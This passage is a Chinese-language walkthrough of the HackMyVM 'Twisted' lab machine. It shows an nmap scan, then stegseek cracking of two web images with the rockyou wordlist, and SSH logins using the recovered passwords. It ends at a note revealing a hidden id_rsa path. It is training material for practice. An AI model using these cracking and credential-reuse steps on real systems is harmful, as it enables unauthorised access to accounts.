Twisted
备注
[Linux VM] [Tested on VirtualBox] created by || sml
⏲️ Release Date // 2020-10-15
✔️ MD5 // 421465f7ccfc34907fd8b7fa38f46dbc
☠ Root // 181
💀 User // 184
📝Notes // An easy one. Tested on Vbox.
靶机启动
靶机 IP:
192.168.56.104
nmap 信息搜集
Nmap scan report for 192.168.56.104
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6763a0c98b7af342ac49aba6a73ffcee (RSA)
| 256 8cce8747f8b81a1a78e5b7ce74d7f5db (ECDSA)
|_ 256 9294660b92d3cf7effe8bf3c7b41b75a (ED25519)
MAC Address: 08:00:27:57:30:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
web 服务
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $http get 192.168.56.104
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Fri, 22 Dec 2023 13:50:21 GMT
ETag: W/"5f86a150-e6"
Last-Modified: Wed, 14 Oct 2020 06:57:20 GMT
Server: nginx/1.14.2
Transfer-Encoding: chunked
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>
<h1>But I prefer this one because seems different</h1>
<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">
将两个 jpg 文件下载下来进行分析
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $wget http://192.168.56.104/cat-original.jpg
--2023-12-22 21:53:06-- http://192.168.56.104/cat-original.jpg
正在连接 192.168.56.104:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:288693 (282K) [image/jpeg]
正在保存至: “cat-original.jpg”
cat-original.jpg 100%[==========================================================>] 281.93K --.-KB/s 用时 0.002s
2023-12-22 21:53:06 (162 MB/s) - 已保存 “cat-original.jpg” [288693/288693])
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $wget http://192.168.56.104/cat-hidden.jpg
--2023-12-22 21:53:12-- http://192.168.56.104/cat-hidden.jpg
正在连接 192.168.56.104:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:288706 (282K) [image/jpeg]
正在保存至: “cat-hidden.jpg”
cat-hidden.jpg 100%[==========================================================>] 281.94K --.-KB/s 用时 0.002s
2023-12-22 21:53:12 (127 MB/s) - 已保存 “cat-hidden.jpg” [288706/288706])
stegseek 隐写
cat-original.jpg stegseek
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $stegseek cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
cat-hidden.jpg stegseek
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $stegseek cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
读取解密出来的信息
cat-original.jpg.out
markuslovesbonita
cat-hidden.jpg.out
thisismypassword
隐写数据尝试利用
由于只开放了一个 web 服务,和一个 SSH 服务,所以怀疑图像隐写提取出来的数据为 SSH 的凭据,尝试利用
mateo:thisismypassword
SSH mateo
┌─[✗]─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $ssh mateo@192.168.56.104 -p 2222
mateo@192.168.56.104's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 14 03:21:44 2020 from 192.168.1.58
mateo@twisted:~$ whoami
mateo
markus:markuslovesbonita
SSH mateo
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $ssh markus@192.168.56.104 -p 2222
markus@192.168.56.104's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$ whoami
markus
markus
用户目录下存在 hint
/home/markus/note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.